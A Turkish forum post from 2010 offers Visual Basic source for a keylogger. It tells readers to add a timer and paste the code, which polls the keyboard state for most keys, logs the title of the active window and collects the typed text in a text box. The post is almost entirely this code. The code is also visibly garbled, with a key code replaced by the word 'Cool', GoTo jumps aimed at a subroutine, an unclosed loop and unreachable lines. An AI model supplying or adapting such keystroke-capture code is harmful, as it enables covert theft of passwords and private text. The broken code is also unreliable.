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    Vb Kod Keylogger

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    ● Admin ●

    <b>Doğum tarihi</b> Doğum tarihi : 20/06/90

    Vb Kod Keylogger Empty Vb Kod Keylogger

    Mesaj tarafından MnyTirith Cuma Mart 12, 2010 9:45 pm

    Vereceğim kodları kopyalayın projenize birtane timer nesnesi koyun ismi:timer1 interval=10 olsun birde formunuzun ismide form1 olsun.Daha sonrada işte;

    Private Declare Function GetForegroundWindow Lib "user32" () As Long
    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
    Private Declare Function GetWindowTextLength Lib "user32" Alias "GetWindowTextLengthA" (ByVal hwnd As Long) As Long
    Private Declare Function GetWindowText Lib "user32" Alias "GetWindowTextA" (ByVal hwnd As Long, ByVal lpString As String, ByVal cch As Long) As Long
    Private Declare Function GetKeyState Lib "user32" (ByVal nVirtKey As Long) As Integer

    Dim a(0 To 9) As String
    Dim Baslik As String
    Private Sub Timer1_Timer()
    On Error Resume Next
    Dim BasilanTus As String
    Dim dongu As Byte

    'If GetForegroundWindow <> HandleNoSu Then
    ' HandleNoSu = GetForegroundWindow
    If Baslik <> BasligiAl(GetForegroundWindow) Then
    Baslik = BasligiAl(GetForegroundWindow)
    Text1 = Text1 & " [" & Baslik & "] " & vbCrLf

    End If
    'End If

    If GetAsyncKeyState(13) = -32767 Then
    BasilanTus = vbCrLf
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(Cool = -32767 Then
    Text1 = Left(Text1, Len(Text1) - 1)
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(32) = -32767 Then
    BasilanTus = " "
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(186) = -32767 Then
    If ShiftTusu = True Then BasilanTus = ":"
    If ShiftTusu = False Then BasilanTus = ";"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(187) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "+"
    If ShiftTusu = False Then BasilanTus = "="
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(188) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "<"
    If ShiftTusu = False Then BasilanTus = ","
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(189) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "_"
    If ShiftTusu = False Then BasilanTus = "-"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(190) = -32767 Then
    If ShiftTusu = True Then BasilanTus = ">"
    If ShiftTusu = False Then BasilanTus = "."
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(191) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "?"
    If ShiftTusu = False Then BasilanTus = "/"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(192) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "~"
    If ShiftTusu = False Then BasilanTus = "`"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(96) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "0"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(97) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "1"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(98) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "2"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(99) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "3"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(100) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "4"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(101) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "5"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(102) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "6"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(103) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "7"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(104) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "8"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(105) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "9"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(106) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "*"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(107) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "+"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(108) = -32767 Then
    If ShiftTusu = False Then BasilanTus = ""
    Text1.Text = Text1.Text & vbCrLf
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(109) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "-"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(110) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "."
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(111) = -32767 Then
    If ShiftTusu = False Then BasilanTus = "/"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(219) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "{"
    If ShiftTusu = False Then BasilanTus = "["
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(220) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "|"
    If ShiftTusu = False Then BasilanTus = "\"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(221) = -32767 Then
    If ShiftTusu = True Then BasilanTus = "}"
    If ShiftTusu = False Then BasilanTus = "]"
    GoTo tusuyaz
    End If
    If GetAsyncKeyState(222) = -32767 Then
    If ShiftTusu = True Then BasilanTus = Chr(34)
    If ShiftTusu = False Then BasilanTus = "'"
    GoTo tusuyaz
    End If

    dongu = 48
    Do Until dongu = 91
    If GetAsyncKeyState(dongu) = -32767 Then

    If dongu >= 65 And dongu <= 90 Then
    If CapsLockTusu = True And ShiftTusu = True Then BasilanTus = LCase(Chr(dongu))
    If CapsLockTusu = False And ShiftTusu = False Then BasilanTus = LCase(Chr(dongu))
    If CapsLockTusu = True And ShiftTusu = False Then BasilanTus = UCase(Chr(dongu))
    If CapsLockTusu = False And ShiftTusu = True Then BasilanTus = UCase(Chr(dongu))
    GoTo tusuyaz
    End If

    If dongu >= 48 And dongu <= 57 And ShiftTusu = True Then
    If ShiftTusu = True Then
    BasilanTus = a(Val(Chr(dongu)))
    GoTo tusuyaz
    End If
    End If
    End If
    dongu = dongu + 1

    Exit Sub

    Text1.Text = Text1.Text & BasilanTus
    End Sub

    Function BasligiAl(hwnd As Long)
    Dim hWndTitle As String
    hWndTitle = String(GetWindowTextLength(hwnd), 0)
    GetWindowText hwnd, hWndTitle, (GetWindowTextLength(hwnd) + 1)
    BasligiAl = hWndTitle
    End Function

    Public Sub tusuyaz()
    Text1.Text = Text1 & BasilanTus
    Text1.SelLength = Len(Text1)
    End Sub

    Public Function ShiftTusu() As Boolean
    ShiftTusu = CBool(GetAsyncKeyState(vbKeyShift))
    End Function

    Public Function CapsLockTusu() As Boolean
    CapsLockTusu = CBool(GetKeyState(vbKeyCapital) And 1)
    End Function

      Forum Saati Paz Mayıs 19, 2024 5:58 pm